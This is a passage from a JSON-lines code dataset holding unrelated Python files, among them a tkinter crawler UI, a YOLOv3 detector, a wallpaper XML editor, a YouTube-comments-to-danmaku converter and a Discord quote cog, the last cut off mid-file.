( \"[\"\n + self.__module__\n + \".\"\n + self.__class__.__name__\n + \".\"\n + self._testMethodName\n + \"]\")\n except_path = os.path.join(_dir, _name) + \"_[期望结果].xlsx\"\n actual_path = os.path.join(_dir, _name) + \"_[执行结果].xlsx\"\n return except_path, actual_path\n\n\nif __name__ == \"__main__\":\n df = DB().expectation(\n sql=[\n \"select * from hs_user.excharg;\",\n \"select * from hs_user.exchangetime;\",\n \"select * from hs_user.sysarg;\"\n ]\n )\n # DB().expectation(sql=\"select * from hs_user.exchangetime;\")\n","sub_path":"src/database/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":18652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"352522508","text":"from tkinter import *\nfrom tkinter.filedialog import askopenfilename\nfrom tkinter import filedialog\nfrom main import *\nfrom PIL import ImageTk, Image\nimport os\nfrom time import sleep\n\n\n\n\ndef main():\n OPTIONS = [\n \"Wiley\",\n \"Europe PMC\",\n \"Science Direct\",\n \"Springer\"\n ]\n\n def begin(file,name,choice,first,last):\n craw(file,name,choice,first,last)\n\n root = Tk()\n root.config(height=300, width=600,background='white')\n root.resizable(width=False, height=False)\n root.title(\"Database crawling - URL\")\n\n img = ImageTk.PhotoImage(Image.open(\"bg1.jpg\"))\n panel = Label(root, image = img)\n panel.pack(side = \"top\", fill = \"both\", expand = \"yes\")\n\n group = LabelFrame(root, text=\"Input\", padx=5, pady=5)\n group.pack(padx=10, pady=10)\n group.place(relx=0.5, rely=0.5, anchor=CENTER)\n\n choiceLabel = Label(group,text=\"Select database : \")\n choiceLabel.grid(row=0,column=0)\n\n variable = StringVar(group)\n variable.set(OPTIONS[0]) # default value\n w = OptionMenu(group, variable, *OPTIONS)\n w.grid(row=0,column=1)\n\n keyText = Label(group,text=\"Enter url :\")\n keyEntry = Entry(group)\n keyText.grid(row=1, sticky=E)\n keyEntry.grid(row=1, column=1)\n\n initNumText = Label(group, text=\"first page : \")\n initNumEntry = Entry(group)\n initNumText.grid(row=2, sticky=E)\n initNumEntry.grid(row=2, column=1)\n\n finalNumText = Label(group, text=\"last page : \")\n finalNumEntry = Entry(group)\n finalNumText.grid(row=3, sticky=E)\n finalNumEntry.grid(row=3, column=1)\n\n nameText = Label(group, text=\"Enter file name : \")\n nameEntry = Entry(group)\n nameText.grid(row=4, sticky=E)\n nameEntry.grid(row=4, column=1)\n\n\n\n MyButton = Button(group, text=\"Submit\", width=10,\n command=lambda:begin(keyEntry.get(),nameEntry.get(),variable.get(),initNumEntry.get(),finalNumEntry.get()))\n MyButton.grid(columnspan=2)\n\n root.mainloop()\n\nmain()\n","sub_path":"url crawler/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"600335533","text":"import numpy as np\nfrom PyQt5 import QtWidgets, QtCore\nfrom sklearn.linear_model import LassoLars\n\nfrom point_spectra_gui.ui.cv_LassoLARS import Ui_Form\nfrom point_spectra_gui.util.Modules import Modules\n\n\nclass Ui_Form(Ui_Form, Modules):\n def setupUi(self, Form):\n super().setupUi(Form)\n self.checkMinAndMax()\n self.connectWidgets()\n\n def get_widget(self):\n return self.formGroupBox\n\n def setHidden(self, bool):\n self.get_widget().setHidden(bool)\n\n def connectWidgets(self):\n # LassoLARS\n ll = LassoLars()\n self.minalpha_spin.setDecimals(20)\n self.maxalpha_spin.setDecimals(20)\n\n self.minalpha_spin.setValue(0.0000001)\n self.maxalpha_spin.setValue(0.01)\n self.nalpha_spin.setValue(100)\n self.fit_intercept_list.setCurrentItem(\n self.fit_intercept_list.findItems(str(ll.fit_intercept), QtCore.Qt.MatchExactly)[0])\n self.normalize_list.setCurrentItem(self.normalize_list.findItems(str(ll.normalize), QtCore.Qt.MatchExactly)[0])\n self.max_iterLineEdit.setText(str(ll.max_iter))\n self.force_positive_list.setCurrentItem(\n self.force_positive_list.findItems(str(ll.positive), QtCore.Qt.MatchExactly)[0])\n\n def run(self):\n fit_intercept_items = [i.text() == 'True' for i in self.fit_intercept_list.selectedItems()]\n normalize_items = [i.text() == 'True' for i in self.normalize_list.selectedItems()]\n positive_items = [i.text() == 'True' for i in self.force_positive_list.selectedItems()]\n alphas = np.logspace(np.log10(self.minalpha_spin.value()), np.log10(self.maxalpha_spin.value()),\n num=self.nalpha_spin.value())\n params = {\n 'alpha': alphas,\n 'fit_intercept': fit_intercept_items,\n 'verbose': [True],\n 'normalize': normalize_items,\n 'precompute': ['auto'],\n 'max_iter': [int(i) for i in self.max_iterLineEdit.text().split(',')],\n 'copy_X': [True],\n 'fit_path': [False],\n 'positive': positive_items,\n 'model': [0]\n }\n modelkey = str(params)\n return params, modelkey\n\n\nif __name__ == \"__main__\":\n import sys\n\n app = QtWidgets.QApplication(sys.argv)\n Form = QtWidgets.QWidget()\n ui = Ui_Form()\n ui.setupUi(Form)\n Form.show()\n sys.exit(app.exec_())\n","sub_path":"point_spectra_gui/core/crossValidateMethods/cv_LassoLARS.py","file_name":"cv_LassoLARS.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"187726925","text":"import sys\nfrom heapq import heappush, heappop\ninput = sys.stdin.readline\n\nn = int(input())\nheap = []\n\nfor x in range(n):\n table = list(map(int, input().split()))\n\n if x == 0:\n for t in table:\n heappush(heap, t)\n continue\n\n for t in table:\n if t > heap[0]:\n heappush(heap, t)\n heappop(heap)\n\nprint(heap[0])\n \n","sub_path":"Hangil/day09_2075_choi.py","file_name":"day09_2075_choi.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"199888955","text":"from lxml.etree import parse, SubElement, XMLParser, ElementTree, Element\nfrom argparse import ArgumentParser\nimport os\n\ndefault_xml_file_path = '/usr/share/gnome-background-properties/my-backgrounds.xml'\n\n\ndef add_wallpaper(wallpaper_file_path, xml_file_path, name_text, options_text, pcolor_text='#ffffff', scolor_text='#000000'):\n\n print('in add_wallpaper')\n\n tree = get_tree(xml_file_path)\n wallpapers = tree.getroot()\n\n if wallpaper_is_there(wallpaper_file_path, wallpapers) != []:\n print('not adding.')\n return\n\n wallpaper = SubElement(wallpapers, 'wallpaper', deleted=\"false\")\n\n name = SubElement(wallpaper, 'name')\n name.text = name_text\n filename = SubElement(wallpaper, 'filename')\n filename.text = wallpaper_file_path\n options = SubElement(wallpaper, 'options')\n options.text = options_text\n\n pcolor = SubElement(wallpaper, 'pcolor')\n pcolor.text = pcolor_text\n scolor = SubElement(wallpaper, 'scolor')\n scolor.text = scolor_text\n\n write_xml(tree, xml_file_path)\n\n\ndef get_tree(xml_file_path):\n parser = XMLParser(remove_blank_text=True)\n try:\n tree = parse(xml_file_path, parser)\n except OSError as e:\n print(e)\n print(\"Couldn't find file, creating new file.\")\n create_valid_xml(xml_file_path)\n return tree\n\n\ndef remove_wallpaper(remove_name, xml_file_path):\n\n print('in remove_wallpaper')\n\n tree = get_tree(xml_file_path)\n wallpapers = tree.getroot()\n\n results = wallpaper_is_there(remove_name, wallpapers)\n if results == []:\n print('could not find {}'.format(remove_name))\n return\n\n #found the wallpaper\n print('removing {} matches.'.format(len(results)))\n\n for wallpaper in results:\n while wallpaper.tag != 'wallpaper':\n wallpaper = wallpaper.getparent()\n wallpapers.remove(wallpaper)\n\n write_xml(tree, xml_file_path)\n\n\ndef write_xml(tree, xml_file_path):\n print('about to write to file')\n with open(xml_file_path, 'wb') as f:\n tree.write(f, pretty_print=True)\n\n\ndef create_valid_xml(xml_file_path):\n wallpapers = Element('wallpapers')\n tree = ElementTree(wallpapers)\n write_xml(tree, xml_file_path)\n\n\ndef wallpaper_is_there(search_query, wallpapers):\n\n results = []\n for desc in wallpapers.iterdescendants():\n if desc.text is not None and search_query in desc.text:\n #if desc.text == search_query:\n print('matched.')\n results.append(desc)\n return results\n\n\ndef main():\n parser = ArgumentParser()\n parser.add_argument('-a', '--add', nargs='+', type=str, help='wallpaper image file(s)', metavar=('filename_1', 'filename_2'))\n parser.add_argument('-r', '--remove', nargs='+', type=str, help='wallpaper name(s) or filename(s) to remove', metavar=('search_1', 'search_2'))\n parser.add_argument('-x', '--xml', type=str, help='specify the output xml file', default=default_xml_file_path)\n parser.add_argument('-n', '--name', nargs='+', help='specify the wallpaper name(s) respectively for -a args', metavar=(\"'Name 1'\", \"'Name 2'\"))\n parser.add_argument('-o', '--options', nargs='+', help='specify options_text', metavar=('opt1', 'opt2'), choices=['zoom'], default='zoom')\n args = parser.parse_args()\n\n if args.name is None:\n args.name = []\n if args.options is None:\n args.options = []\n args.name = args.name + [x for x in args.add[max(len(args.name), len(args.add)):]]\n args.options = args.options + ['zoom']*(len(args.name)-len(args.options))\n\n if args.remove is not None:\n for i in range(len(args.remove)):\n remove_wallpaper(args.remove[i], os.path.abspath(args.xml))\n\n if args.add is not None:\n for i in range(len(args.add)):\n add_wallpaper(os.path.abspath(args.add[i]), os.path.abspath(args.xml), args.name[i], args.options[i])\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"my-backgrounds.py","file_name":"my-backgrounds.py","file_ext":"py","file_size_in_byte":3910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"565857736","text":"import torch\n\nfrom .distributed import DistributedSampler\nfrom .iteration_based_batch_sampler import IterationBasedBatchSampler\n\n\ndef make_data_sampler(dataset, shuffle, distributed):\n if distributed:\n return DistributedSampler(dataset, shuffle=shuffle)\n if shuffle:\n sampler = torch.utils.data.sampler.RandomSampler(dataset)\n else:\n sampler = torch.utils.data.sampler.SequentialSampler(dataset)\n\n return sampler\n\n\ndef make_batch_data_sampler(\n cfg, dataset, shuffle, distributed,\n images_per_batch, num_iters=None, start_iter=0\n):\n sampler = make_data_sampler(dataset, shuffle, distributed)\n drop_last = cfg.DATASETS.DROP_LAST\n batch_sampler = torch.utils.data.sampler.BatchSampler(\n sampler, images_per_batch, drop_last=drop_last\n )\n if num_iters is not None:\n batch_sampler = IterationBasedBatchSampler(\n batch_sampler, num_iters, start_iter\n )\n return batch_sampler\n","sub_path":"p3t/data/samplers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"325498670","text":"import random\nimport characters\nimport time\n\n\n\n# defines the dice rolling mechanic\n\n\ndef roll_dice(sides):\n return random.randint(1, sides)\n\n\n\n\n\ndef tutorial():\n print(\"A thug is standing before you about to attack! Rolling for initiative....\")\n pc_init = 0\n npc_init = 0\n global att_order\n att_order = 0\n while pc_init == npc_init: # initiative roll, while pc and npc are equal, reroll\n pc_init = roll_dice(20)\n npc_init = roll_dice(20)\n if pc_init > npc_init:\n time.sleep(1)\n print(\"You roll a \" + str(pc_init) + \", your initiative roll was greater than your\"\n \"opponents, you attack first!\")\n att_order = 1\n elif pc_init < npc_init:\n time.sleep(1)\n print(\"You roll a \" + str(pc_init) + \", you attack second!\")\n att_order1 = 2\n print(att_order)\n\n print(\"Lets fight!\")\n print(\"Select action: attack, run\")\n\n\ndef queueTutorial():\n print(\"If you would like to see the tutorial tpe: tutorial\")\n if input() == 'tutorial': #template for a combat scenario\n tutorial()\n else: print(\"You have selected not to see how the combat looks\")\n\n\ndef inputDice():\n input = [input()]\n print(input)\n\n\ndef inputRoll():\n\n acceptableDice = ['6', '8', '10', '20', '100']\n print(\"Lets roll some dice to test the rolling. Enter a dice to roll from the following dice: 6, 8, 10, 20, 100\")\n input_roll = input()\n\n while input_roll not in acceptableDice:\n print('You need to enter one of the above mentioned dice.')\n input_roll = input()\n else:\n print(\"Rolling dice.....\")\n time.sleep(2)\n roll = (int(roll_dice(int(input_roll))))\n print(roll)\n time.sleep(.5)\n print(\"You rolled a \" + str(roll) + \", congratulations on your first dice roll!\")\n\n\n# rolls against call in main.py x=modifier, y=required ability check. Example call: ability_check(Player1mod.wis, 15)\ndef ability_check(x,y):\n roll = roll_dice(20)+x\n if roll >= y:\n print(\"You successfully perform action\")\n else:\n print(\"You failed to perform action\")\n\n","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"535651748","text":"__author__ = 'ab53995'\n\n# Färger, http://www.colorpicker.com/\nBLACK = (0, 0, 0)\nROSA = ( 255, 0, 132)\n\nimport pygame\npygame.init()\n\nsize = (700, 500)\nscreen = pygame.display.set_mode(size)\n# För att få fullscreen, siffrorna är skärmens upplösning\npygame.display.set_mode((1366, 768), pygame.FULLSCREEN)\n\ndone = False\nclock = pygame.time.Clock()\n\nwhile not done:\n for event in pygame.event.get():\n # Gör att programet stängs när man trycker på en knapp\n if event.type == pygame.KEYDOWN:\n done = True\n if event.type == pygame.QUIT:\n print(\"User has asked to quit.\")\n done = True\n\n # Färgen som fyller hela fönstret\n screen.fill(ROSA)\n\n # Själva texten, siffran efter typsnittet är storleken.\n font = pygame.font.SysFont('Courier New', 300, True, False)\n text = font.render(\"QUIZ!\", True, BLACK)\n # Var på skärmen texten läggs ut\n screen.blit(text, [250, 200])\n\n # Printar allting på skärmen\n pygame.display.flip()\n # Hur många gånger per sekund som skärmen uppdateras\n clock.tick(60)\n\npygame.quit()\n","sub_path":"Test och problemlösning/mirella.py","file_name":"mirella.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"83796489","text":"import cv2\r\nimport numpy as np\r\n\r\ncap = cv2.VideoCapture(0)\r\nwhT = 320\r\nconfidenceThreshold = 0.5\r\nnms_threshold = 0.3\r\n\r\nclassFiles = r'E:\\Python Project\\Resources\\AI_Files\\Yolo_v3\\coco.names'\r\nclassNames = []\r\n\r\n# --- Read the Coco name file contents---\r\nwith open(classFiles, 'rt') as f:\r\n classNames = f.read().rstrip('\\n').rsplit('\\n')\r\n #print(classNames)\r\n #print(len(classNames))\r\n\r\n# ---Initialize the Yolo v3 names files---\r\nmodelConfiguration = r'E:\\Python Project\\Resources\\AI_Files\\Yolo_v3\\yolov3-tiny.cfg'\r\nmodelWeight = r'E:\\Python Project\\Resources\\AI_Files\\Yolo_v3\\yolov3-tiny.weights'\r\n\r\n\r\n# --- Create our network ---\r\nnet = cv2.dnn.readNetFromDarknet(modelConfiguration, modelWeight)\r\nnet.setPreferableBackend(cv2.dnn.DNN_BACKEND_OPENCV)\r\nnet.setPreferableTarget(cv2.dnn.DNN_TARGET_CPU)\r\n\r\ndef findObjects(outputs,img):\r\n hT, wT, cT = img.shape\r\n #print(img.shape) # 480, 640, 3\r\n boundingbox = []\r\n classIds = []\r\n confidenceLevel = []\r\n\r\n for output in outputs:\r\n for detect in output:\r\n scores = detect[5:] # Read the data from 5\r\n classId = np.argmax(scores) # Filter out and find the highest scores within the first 5 and takes its ID\r\n confidence = scores[classId] # Find the confidence by referring to highest schore ID\r\n\r\n if confidence > confidenceThreshold:\r\n w,h = int(detect[2]*wT), int(detect[3]*hT)\r\n x,y = int((detect[0]*wT)-w/2), int((detect[1]*hT - h/2))\r\n #print(w,h,x,y)\r\n boundingbox.append([x,y,w,h])\r\n classIds.append(classId)\r\n confidenceLevel.append(float(confidence))\r\n #print(len(boundingbox)) # Determine how many object it detects\r\n\r\n indices = cv2.dnn.NMSBoxes(boundingbox,confidenceLevel,confidenceThreshold,nms_threshold)\r\n for i in indices:\r\n i = i[0]\r\n box = boundingbox[i]\r\n x,y,w,h = box[0], box[1], box[2], box[3]\r\n #print(x,y,w,h)\r\n cv2.rectangle(img, (x, y), (x+w,y+h), (255, 0 , 255), 2)\r\n cv2.putText(img,f'{classNames[classIds[i]].upper()} {int(confidenceLevel[i]*100)}%',(x, y-10), cv2.FONT_HERSHEY_SIMPLEX, 0.6, (255, 0, 255), 2)\r\n \r\nwhile True:\r\n success, img = cap.read()\r\n\r\n # ---Convert our Capture image to Blob network---\r\n blob = cv2.dnn.blobFromImage(img, 1/255, (whT, whT), [0,0,1],1,crop=False)\r\n net.setInput(blob)\r\n #print(blob)\r\n\r\n # ---Get the name of all the layer detected from webcam --\r\n LayerNames = net.getLayerNames()\r\n #print(LayerNames)\r\n\r\n # --- Return the index of the output Layers --\r\n #print(net.getUnconnectedOutLayers())\r\n\r\n # --- We wanted to get output layer names within the Layer Names, we -1 to ---\r\n outputNames = [LayerNames[i[0]-1] for i in net.getUnconnectedOutLayers()]\r\n #print(outputNames)\r\n\r\n outputs = net.forward(outputNames)\r\n #print(outputs[0][0]) # --> Printing first row [0] only \r\n #print(outputs[0]) # --> Output for 300 rows (total detection in rows) & 85 columns 80 (coco list), 5 (cx,cy,w,h,confidence)\r\n #print(outputs[1]) # --> Output for 1200 rows (total detection in row) & 85 columns 80 (coco list), 5 (cx,cy,w,h,confidence)\r\n \r\n findObjects(outputs,img)\r\n\r\n cv2.imshow(\"Output\",img)\r\n if cv2.waitKey(1) & 0XFF == ord('q'):\r\n break\r\n\r\n\r\n","sub_path":"open_cv_yolo_v3_Person_detect.py","file_name":"open_cv_yolo_v3_Person_detect.py","file_ext":"py","file_size_in_byte":3352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"78223877","text":"\"\"\"\nThe aim of this script is to 1) count the amount of unique genes in annotated bed files and 2) to provide\nthe list of these unique genes. The annotated bed-file is first imported as a data frame and the gene names\nare distinguished by splitting the annotation column by \"_\". The duplicated genes names are then dropped\nand the amount of unique genes are calculated.\n\nto run the script provide the path to the gene annotated bed-file in the --input flag and write the absolute\npath and the name of the output file in the --output flag. Write \"python calculate_genes.py --help\" for more info.\n\n\"\"\"\n\nimport pandas as pd\nimport click\nimport re\n\n\ndef read_bed_file(input_path):\n '''\n input: string\n\n output: DataFrame\n\n The function will read an absolut path where the annotated gene bed-file is located and will create\n a new DataFrame and add header which will be the output.\n\n '''\n # Header to be used\n column_header = ['chr', 'start', 'end', 'annotation']\n\n # Open the input file as tab-seperated csv.\n with open(input_path) as f:\n df = pd.read_csv(f, names=column_header, sep = '\\t')\n\n return df\n\n\ndef splitting(df):\n\n '''\n input: DataFrame\n\n output: DataFrame\n\n This function will first create a new dataframe from the annotation column and then split the gene\n name from the tx and exon numbers. The duplicates are then dropped and the index reseted.\n '''\n\n # Create df with only the annotation column\n annotation_df = pd.DataFrame(data = df.loc[:,'annotation'])\n\n # split() on all '|' in annotation col and paste the results transposed by explode() and drop duplicates.\n split_pipe_df = annotation_df.annotation.str.split('|').explode().drop_duplicates()\n\n # Reset index to also include the col name and remove the extra 'index' col\n reset_index_pipe_df = split_pipe_df.reset_index().drop(['index'], axis = 1)\n\n # Reapeat above command to split() on ',' to be able to extract the genes in the end of\n # each line in the annotated bed-file\n split_comma_df = reset_index_pipe_df.annotation.str.split(',').explode().drop_duplicates()\n reset_index_comma_df = split_comma_df.reset_index().drop(['index'], axis = 1)\n\n return reset_index_comma_df\n\ndef unique_genes(df):\n\n '''\n input: DataFrame\n\n output: DataFrame\n\n Here, all tx (which are starting with either NM_ or NR_) are extracted to a new df. The index numbers\n are then identified and the tx are dropped from the original input df according to those indexes.\n '''\n\n # assign() will add extra column and will overwrite 'annotation' col since the same variable 'annotation ='\n # is used. str.findall() will return values in list, where '.._' matches all tx prefixes according to regex re.S\n # modifier. Values that does not matched are marked as 'Nan'. explode() espaces the list format\n tx_df = df.assign(annotation=df['annotation'].str.findall('.._'), flags=re.S).explode('annotation')\n\n # Get the indexes which tx prefixes and '.' in the annotation column\n tx_index = tx_df[tx_df['annotation'].str.contains('_') == True].index\n dot_index = df[df['annotation'] == '.'].index\n # Add all the above index to all_index variable to drop all rows at once\n all_index = tx_index.append([dot_index])\n\n # Drop the index number with '.' value, avoid the old index being added as a column by setting drop=True\n final_df = df.drop(all_index).reset_index(drop=True)\n\n return final_df\n\n\ndef write_output(df, output):\n\n '''\n input: DataFrame\n\n output: DataFrame, integer\n '''\n\n # The index column and header are dropped.\n output_df = df.to_csv(output, header=False, index=False)\n\n # nunique() calculates the unique nr of genes.\n unique_genes = df.nunique(axis=0)\n\n print (\"The unique gene count for \", unique_genes)\n return output_df\n\n\n# Using click package to provide the absolut path for the input and output file\n@click.command()\n@click.option('--input', type = click.Path(exists=True), required = True, help = 'path to gene annotated bed-file')\n@click.option('--output', type = click.Path(), required = True, help = 'name and path for the output file' )\n\n\ndef main(input, output):\n\n # Create df from input bed-file\n read_df = read_bed_file(str(input))\n\n split_the_df = splitting(read_df)\n\n get_unique_gene_df = unique_genes(split_the_df)\n\n # wriring an output file of the unique genes.\n write_output(get_unique_gene_df, output)\n\nif __name__ == '__main__':\n main()\n","sub_path":"utilities/annotate_bed_table/calculate_genes.py","file_name":"calculate_genes.py","file_ext":"py","file_size_in_byte":4506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"348237152","text":"#!/usr/bin/env python3\r\n#-*- coding: utf-8 -*-\r\n\"\"\"\r\n@author: zdy93\r\n\"\"\"\r\nfrom absl import app, flags\r\nimport re\r\nimport os\r\nimport requests\r\nfrom xml.dom import minidom\r\nimport time\r\n\r\nflags.DEFINE_string('youtube_url', None, 'Youtube video url, example: https://www.youtube.com/watch?v=mhIeiUbH2gg')\r\nflags.DEFINE_string('dir', None, 'Output File Directories, example: H:\\MyDanmakuFiles')\r\nflags.DEFINE_string('name', None, 'output file Names, example: mydanmaku')\r\nflags.mark_flag_as_required('youtube_url')\r\n\r\nFLAGS = flags.FLAGS\r\n\r\n\r\ndef main(argv):\r\n del argv\r\n url = FLAGS.youtube_url\r\n out_dir = FLAGS.dir\r\n filename = FLAGS.name\r\n y2b(youtube_url=url, out_dir=out_dir, filename=filename)\r\n\r\n\r\ndef y2b(youtube_url, out_dir=None, filename=None):\r\n assert re.search(\"www.youtube.com/watch\\?v=\", youtube_url) is not None, \"It is not a youtube video link\"\r\n video_id = youtube_url.split(\"v=\")[1]\r\n url = \"https://serene-hollows-62567.herokuapp.com/api/v3/comments/\"+video_id\r\n try:\r\n jpage = requests.get(url)\r\n except:\r\n print(\"Connection Failed\")\r\n else:\r\n jfile = jpage.json()\r\n assert len(jfile['data']['comments'])>=1, \"No comment available\"\r\n doc = minidom.Document()\r\n root = doc.createElement('i')\r\n doc.appendChild(root)\r\n new_max_limit = str(len(jfile['data']['comments']))\r\n elelist = [('chatserver', 'chat.bilibili.com'), ('chatid', video_id),\r\n ('mission', '0'), ('maxlimit', new_max_limit),\r\n ('state', '0'), ('real_name', '0'), ('source', 'k-v')]\r\n for ele in elelist:\r\n new_e = doc.createElement(ele[0])\r\n new_e.appendChild(doc.createTextNode(ele[1]))\r\n root.appendChild(new_e)\r\n for i in jfile['data']['comments']:\r\n p_list = []\r\n stime = \"%.5f\"%(float(i['stime'])/1000.0)\r\n p_list.append(stime)\r\n p_list.append(str(i['mode']))\r\n p_list.append('25')\r\n p_list.append(str(i['color']))\r\n p_list.append(str(int(time.time())))\r\n p_list.append(\"0\")\r\n p_list.append(str(i['user_id']))\r\n p_list.append(str(i['comment_id']))\r\n new_d = doc.createElement('d')\r\n new_d.setAttribute('p', ','.join(p_list))\r\n new_d.appendChild(doc.createTextNode(i['text']))\r\n root.appendChild(new_d)\r\n if out_dir is None:\r\n if filename is None:\r\n output_file = video_id+'.xml'\r\n else:\r\n output_file = filename+'.xml'\r\n else:\r\n if not os.path.exists(out_dir):\r\n os.mkdir(out_dir)\r\n if filename is None:\r\n output_file = video_id + '.xml'\r\n output_file = os.path.join(out_dir, output_file)\r\n else:\r\n output_file = filename + '.xml'\r\n output_file = os.path.join(out_dir, output_file)\r\n with open(output_file, 'w', encoding=\"utf-8\") as fp:\r\n doc.writexml(fp, indent='\\t', addindent='\\t', newl='\\n', encoding='utf-8')\r\n print(\"Finished, the output file is %s\" % output_file)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app.run(main)\r\n","sub_path":"Y2B.py","file_name":"Y2B.py","file_ext":"py","file_size_in_byte":3244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"608670547","text":"def suppression_espace_string(string):\n liste=list(string)\n m=0\n while m1:\n liste.pop(-1)\n if len(liste)>0:\n string=liste[0] #on passe d'une liste de string à un string : [\"machin\"] -> \"machin\"\n return string\n\n\n\n\ndef fraude_lignes(path1,path2):\n with open(path1,'r') as code1:\n with open(path2,'r') as code2:\n code1_list=list(code1)\n code2_list=list(code2)\n #on supprime d'abord les espaces préliminaires dans les lignes\n for i in range(len(code1_list)):\n code1_list[i]=suppression_espace_string(code1_list[i])\n for i in range(len(code2_list)):\n code2_list[i]=suppression_espace_string(code2_list[i])\n #on crée result qui sera une liste de couple contenant la ligne présente dans les deux dossiers et le nombre de fois qu'on les retrouve\n result=[]\n for i in range(len(code1_list)):\n if code1_list[i] in code2_list and code1_list[i] not in result:\n #la ligne est dans le 2ème code mais pas déja compté dans result\n result.append([code1_list[i],1])\n elif code1_list[i] in code2_list :\n #la ligne est dans code2 et dans result donc on cherche l'endroit dans result et on incrémente\n k=0\n while code1_list[i]!=result[k][0] and k max_area:\n\t\t\tmax_area = area\n\t\t\tmax_i = i\n\n\tcontour = contours[max_i]\n\treturn contour\ndef draw_centroid(contour):\n\tmoments = cv2.moments(contour)\n\tif moments['m00'] != 0:\n\t\tcx = int(moments['m10']/moments['m00'])\n\t\tcy = int(moments['m01']/moments['m00'])\n\t\treturn (cx,cy)\n\telse:\n\t\treturn None\t\ndef draw_defects(contour):\n\thull = cv2.convexHull(contour, returnPoints=False)\n\tif hull is not None and len(hull > 3) and len(contour) > 3:\n\t\tdefects = cv2.convexityDefects(contour, hull)\t\n\t\treturn defects\n\telse: \n\t\treturn None\ndef draw_farthest_point(defects, contour, centroid):\n\ts = defects[:,0][:,0]\n\tcx, cy = centroid\n\t\n\tx = np.array(contour[s][:,0][:,0], dtype=np.float)\n\ty = np.array(contour[s][:,0][:,1], dtype=np.float)\n\t\t\t\t\n\txp = cv2.pow(cv2.subtract(x, cx), 2)\n\typ = cv2.pow(cv2.subtract(y, cy), 2)\n\tdist = cv2.sqrt(cv2.add(xp, yp))\n\n\tdist_max_i = np.argmax(dist)\n\n\tif dist_max_i < len(s):\n\t\tfarthest_defect = s[dist_max_i]\n\t\tfarthest_point = tuple(contour[farthest_defect][0])\n\t\treturn farthest_point\n\telse:\n\t\treturn None\t\n\ndef draw_hull(contour):\n\thull = cv2.convexHull(contour)\n\treturn hull\ndef draw_final(frame, hist): \n hand_masked = apply_hist_mask(frame, hist)\n\n contours= draw_contours(hand_masked)\n if contours is not None and len(contours) > 0:\n max_contour = draw_max_contour(contours)\n hull = draw_hull(max_contour)\n centroid = draw_centroid(max_contour)\n defects = draw_defects(max_contour)\n\n if centroid is not None and defects is not None and len(defects) > 0: \n farthest_point = draw_farthest_point(defects, max_contour, centroid)\n\n if farthest_point is not None:\n plot_farthest_point(frame, farthest_point)\n plot_centroid(frame,centroid)\ndef plot_farthest_point(frame, point):\n\t\tcv2.circle(frame, point, 5, [0,0,255], -1)\ndef plot_centroid(frame, point):\n\t\tcv2.circle(frame, point, 5, [255,0,0], -1)\n\nif __name__ == '__main__':\n import sys\n import getopt\n import numpy as np\n\t\n\nframe = sys.argv[1]\nbase = sys.argv[2]\nprint (frame)\nimg = cv2.imread(frame)\nbase = cv2.imread(sys.argv[2])\nimg,_,_ = draw_hand_rect(base)\nhist=set_hand_hist(img)\nres=apply_hist_mask(img,hist)\ncv2.imshow('image',res)\ncv2.imshow('image',img)\ndraw_final(res,hist)\ncv2.imshow('image',res)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n","sub_path":"traitement_dimage/detection/detection.py","file_name":"detection.py","file_ext":"py","file_size_in_byte":5145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"514238526","text":"import discord\nfrom discord.ext import commands\nfrom core import checks\nfrom core.models import PermissionLevel\n\nclass Quote(commands.Cog):\n \"\"\"\n Let's you send a quote to a designated channel.\n \"\"\"\n def __init__(self, bot):\n self.bot = bot\n self.coll = bot.plugin_db.get_partition(self)\n\n @commands.command(aliases = ['qu'])\n @checks.has_permissions(PermissionLevel.ADMIN)\n async def setquotechannel(self, ctx, channel: discord.TextChannel):\n \"\"\"\n Set the channel where quotes go.\n \"\"\"\n await self.coll.find_one_and_update(\n {\"_id\": \"config\"},\n {\"$set\": {\"quote-channel\": {\"channel\": str(channel.id)}}},\n upsert=True,\n )\n embed=discord.Embed(title=f'Set quote channel to {channel}.', color=0x4dff73)\n embed.set_author(name=\"Success!\")\n embed.set_footer(text=\"Task succeeded successfully.\")\n await ctx.send(embed=embed)\n\n @commands.command()\n async def quote(self, ctx, *, quote):\n \"\"\"\n Quote something!\n \"\"\"\n async with ctx.channel.typing():\n config = await self.coll.find_one({\"_id\": \"config\"})\n if config is None:\n embed=discord.Embed(title=\"quote channel not set.\", color=self.bot.error_colour)\n embed.set_author(name=\"Error.\")\n embed.set_footer(\"Task failed successfully.\")\n await ctx.send(embed=embed)\n else:\n quote_channel = self.bot.get_channel(int(config[\"quote-channel\"][\"channel\"]))\n await quote_channel.send(\"<@&687701012357578820>\");\n embed=discord.Embed(title=quote, color=self.bot.main_color)\n embed.set_author(name=f\"Quote sent by {ctx.author}:\", icon_url=ctx.author.avatar_url)\n await quote_channel.send(embed=embed)\n \n await ctx.message.add_reaction('\\N{WHITE HEAVY CHECK MARK}')\n\ndef setup(bot):\n 